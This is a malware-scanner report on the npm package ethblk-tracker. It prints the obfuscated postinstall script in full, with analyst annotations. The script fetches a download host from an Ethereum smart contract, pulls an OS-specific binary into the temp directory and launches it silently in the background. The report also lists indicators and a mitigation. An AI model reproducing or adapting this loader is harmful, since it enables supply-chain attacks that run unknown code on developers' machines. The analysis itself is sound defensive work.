Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
ethblk-tracker:
Detected: 31 Oct 2024
Detected Date: 31 Oct 2024
Affected Install Script: postinstall
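The postinstall script reads a string from a smart contract on the Ethereum blockchain and uses it as a base URL, so the download location is not hard-coded in the package. It then downloads an executable chosen by operating system (`node-win.exe` on Windows, `node-linux` on Linux, `node-macos` on macOS) into the system temporary directory, marks it executable on non-Windows systems, and launches it as a detached background process with its output discarded. Because this runs automatically during `npm install`, it poses a significant security risk: it can download and run malicious code on the victim's machine without their consent. Installing with `npm install --ignore-scripts` prevents lifecycle scripts such as this one from running.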
Install script: node uzzz6vul.cjs
Install script code:
// Analyst annotations; the code itself is unchanged, only line breaks and comments were added.
// Summary: the script reads a string from an Ethereum mainnet contract, treats it as a base
// URL, downloads an OS-specific binary into the temp directory and starts it detached.
// Indicators visible in this file:
//   - contract address   0xa1b40044EBc2794f207D45143Bd82a1B86156c6b
//   - lookup key address 0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84
//   - remote file names  /node-win.exe, /node-linux, /node-macos
//   - local drop path    os.tmpdir() joined with the same file name
// The download host itself is NOT in this file; it is whatever string the contract returns.

// String decoder: _0x16fc(i) returns entry (i - 0x8e) of the table built by _0x289d().
const _0x47be3d=_0x16fc;
function _0x16fc(_0x2fe9c6,_0x892712){const _0x289dd9=_0x289d();return _0x16fc=function(_0x16fcad,_0x29df1d){_0x16fcad=_0x16fcad-0x8e;let _0x373553=_0x289dd9[_0x16fcad];return _0x373553;},_0x16fc(_0x2fe9c6,_0x892712);}
// Table rotation: shifts the first entry to the end until the parseInt() arithmetic over the
// numeric-prefixed entries equals 0xee113. A rotation of 24 positions satisfies the check, so
// the order of strings in the source table is not the order used for lookups. The decoded
// values quoted in the comments below are the post-rotation values.
(function(_0x12de34,_0x5965a0){const _0x3329fd=_0x16fc,_0x1dc971=_0x12de34();while(!![]){try{const _0x4076b6=parseInt(_0x3329fd(0xb8))/0x1+-parseInt(_0x3329fd(0xab))/0x2*(-parseInt(_0x3329fd(0xa8))/0x3)+parseInt(_0x3329fd(0xba))/0x4+-parseInt(_0x3329fd(0xa6))/0x5+parseInt(_0x3329fd(0xb7))/0x6+-parseInt(_0x3329fd(0xa4))/0x7*(-parseInt(_0x3329fd(0xac))/0x8)+parseInt(_0x3329fd(0x99))/0x9*(-parseInt(_0x3329fd(0xbd))/0xa);if(_0x4076b6===_0x5965a0)break;else _0x1dc971['push'](_0x1dc971['shift']());}catch(_0x3aa3b8){_0x1dc971['push'](_0x1dc971['shift']());}}}(_0x289d,0xee113));
// Module loads: 0xb2 -> 'ethers', 0xa3 -> 'axios', 0xad -> 'path'. 'ethers' and 'axios' are
// third-party packages, so they have to be resolvable at install time for the script to run.
// NOTE(review): `util` is required but never referenced in the visible code.
const {ethers}=require(_0x47be3d(0xb2)),axios=require(_0x47be3d(0xa3)),util=require('util'),fs=require('fs'),path=require(_0x47be3d(0xad)),os=require('os'),{spawn}=require('child_process'),
// Contract setup: 0xb1 -> the contract address listed above; 0x93 -> the one-function ABI
// 'function getString(address account) public view returns (string)';
// 0xc0 -> 'getDefaultProvider', 0xb5 -> 'mainnet'. Network egress to an Ethereum RPC endpoint
// during `npm install` is therefore an observable side effect of this script.
contractAddress=_0x47be3d(0xb1),WalletOwner='0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84',abi=[_0x47be3d(0x93)],provider=ethers[_0x47be3d(0xc0)](_0x47be3d(0xb5)),contract=new ethers['Contract'](contractAddress,abi,provider),
// fetchAndUpdateIp: calls contract.getString(WalletOwner) (0xb9 -> 'getString') and returns the
// resulting string. On failure it logs via console.error with a Russian message (0xc1,
// "Error while obtaining the IP address:") and calls itself again, i.e. it retries with no
// limit or delay. The name and message suggest the stored string is a host/IP; presumably the
// contract owner can change it without publishing a new package version -- the setter is not
// visible here, confirm on-chain.
fetchAndUpdateIp=async()=>{const _0x156f33=_0x47be3d,_0x4d8b1a={'qTJFJ':_0x156f33(0xc1),'dmHFt':function(_0x7f4752){return _0x7f4752();}};try{const _0x1867b4=await contract[_0x156f33(0xb9)](WalletOwner);return _0x1867b4;}catch(_0x1dcffa){return console[_0x156f33(0xaa)](_0x4d8b1a[_0x156f33(0xb3)],_0x1dcffa),await _0x4d8b1a[_0x156f33(0xa7)](fetchAndUpdateIp);}},
// getDownloadUrl: appends a per-platform file name to the base string from the contract.
// 'win32' -> '/node-win.exe', 'linux' -> '/node-linux', 'darwin' -> '/node-macos' (0x96);
// any other os.platform() value throws 'Unsupported platform: ' + platform.
getDownloadUrl=_0x4f440a=>{const _0x2180bc=_0x47be3d,_0x41e3dd={'bQyxM':_0x2180bc(0x98),'SLSiA':_0x2180bc(0x9a),'TtkoB':'darwin'},_0x40972f=os['platform']();switch(_0x40972f){case _0x41e3dd['bQyxM']:return _0x4f440a+'/node-win.exe';case _0x41e3dd[_0x2180bc(0xbf)]:return _0x4f440a+'/node-linux';case _0x41e3dd[_0x2180bc(0xb4)]:return _0x4f440a+_0x2180bc(0x96);default:throw new Error(_0x2180bc(0x92)+_0x40972f);}},
// downloadFile(url, dest): axios request with method 'GET' (0xa2) and responseType 'stream'
// (0x9e), piped (0x8f -> 'pipe') into fs.createWriteStream(dest). The returned promise settles
// on the write stream's 'finish' (0x9f) or 'error' event. No integrity or signature check is
// performed on the downloaded bytes.
downloadFile=async(_0x19de6b,_0x4ab729)=>{const _0x4d957f=_0x47be3d,_0x268fea={'cpBNg':_0x4d957f(0x9f),'Rucqe':'error','QNnyt':function(_0x5d0397,_0x2d1083){return _0x5d0397(_0x2d1083);},'ZsWDI':_0x4d957f(0xa2),'JQwHq':_0x4d957f(0x9e)},_0x18b5a9=fs['createWriteStream'](_0x4ab729),_0x237ea5=await _0x268fea['QNnyt'](axios,{'url':_0x19de6b,'method':_0x268fea[_0x4d957f(0x9b)],'responseType':_0x268fea[_0x4d957f(0x95)]});return _0x237ea5['data'][_0x4d957f(0x8f)](_0x18b5a9),new Promise((_0x5789aa,_0x104c22)=>{const _0x48b958=_0x4d957f;_0x18b5a9['on'](_0x268fea[_0x48b958(0x9c)],_0x5789aa),_0x18b5a9['on'](_0x268fea[_0x48b958(0xa5)],_0x104c22);});},
// executeFileInBackground(file): spawn(file, [], {detached: true, stdio: 'ignore'}) followed by
// unref(), so the child is not tied to the npm/node parent and produces no console output.
// 0x8e -> 'ignore'; 0x90 -> Russian log message, "Error while launching the file:".
// Detection hint: a node process started by an npm lifecycle script spawning a binary from the
// temp directory.
executeFileInBackground=async _0x31f8b6=>{const _0x40f257=_0x47be3d,_0x581981={'jmEhp':function(_0x375808,_0x4ac2d8,_0x20dd53,_0x13fca8){return _0x375808(_0x4ac2d8,_0x20dd53,_0x13fca8);},'giNBn':_0x40f257(0x8e),'ASwFq':_0x40f257(0x90)};try{const _0x1cb495=_0x581981[_0x40f257(0x97)](spawn,_0x31f8b6,[],{'detached':!![],'stdio':_0x581981[_0x40f257(0xbb)]});_0x1cb495['unref']();}catch(_0x186e18){console['error'](_0x581981[_0x40f257(0xb0)],_0x186e18);}},
// runInstallation: orchestrates the chain. Base string from the contract -> download URL ->
// destination = path.join(os.tmpdir(), path.basename(url)) -> download -> on any platform other
// than 'win32', fs.chmodSync(dest, '755') (0xa1 -> '755') -> detached launch. Any exception is
// logged with the Russian prefix 'Ошибка установки:' ("Installation error:") and swallowed, so
// the npm install itself does not fail visibly.
runInstallation=async()=>{const _0x5379d0=_0x47be3d,_0xed2042={'ZJJcQ':function(_0x13fad8){return _0x13fad8();},'CFyYW':function(_0x11d752,_0x1fb993,_0x51bbbd){return _0x11d752(_0x1fb993,_0x51bbbd);},'LymQt':function(_0x484505,_0x24f7d5){return _0x484505!==_0x24f7d5;},'vIyaR':_0x5379d0(0x98),'KlAig':_0x5379d0(0xa1),'WHMoW':function(_0x1afc23,_0x578661){return _0x1afc23(_0x578661);},'rvtyh':'Ошибка\x20установки:'};try{const _0x22b2d1=await _0xed2042[_0x5379d0(0xae)](fetchAndUpdateIp),_0xbf437a=getDownloadUrl(_0x22b2d1),_0x2e5301=os[_0x5379d0(0xa0)](),_0x259848=path[_0x5379d0(0xbc)](_0xbf437a),_0x3bde32=path['join'](_0x2e5301,_0x259848);await _0xed2042[_0x5379d0(0xbe)](downloadFile,_0xbf437a,_0x3bde32);if(_0xed2042[_0x5379d0(0xa9)](os[_0x5379d0(0xb6)](),_0xed2042[_0x5379d0(0x9d)]))fs[_0x5379d0(0x94)](_0x3bde32,_0xed2042['KlAig']);_0xed2042[_0x5379d0(0x91)](executeFileInBackground,_0x3bde32);}catch(_0x27d90c){console[_0x5379d0(0xaa)](_0xed2042[_0x5379d0(0xaf)],_0x27d90c);}};
// String table consumed by the decoder above (stored pre-rotation). The entries with numeric
// prefixes exist only to feed the rotation checksum; the short mixed-case entries are keys of
// the per-function indirection objects.
function _0x289d(){const _0x430518=['error','487498rPgJcF','589720McyToR','path','ZJJcQ','rvtyh','ASwFq','0xa1b40044EBc2794f207D45143Bd82a1B86156c6b','ethers','qTJFJ','TtkoB','mainnet','platform','9971130ilmkvi','1788475ewoHxC','getString','5763100FiIAUi','giNBn','basename','14560880kZaEQe','CFyYW','SLSiA','getDefaultProvider','Ошибка\x20при\x20получении\x20IP\x20адреса:','ignore','pipe','Ошибка\x20при\x20запуске\x20файла:','WHMoW','Unsupported\x20platform:\x20','function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)','chmodSync','JQwHq','/node-macos','jmEhp','win32','27OPbpOs','linux','ZsWDI','cpBNg','vIyaR','stream','finish','tmpdir','755','GET','axios','49vHSudo','Rucqe','2756105TgRdgT','dmHFt','6OOqLtW','LymQt'];_0x289d=function(){return _0x430518;};return _0x289d();}
// Entry point: runs as soon as the file is loaded, i.e. when npm executes the postinstall hook.
runInstallation();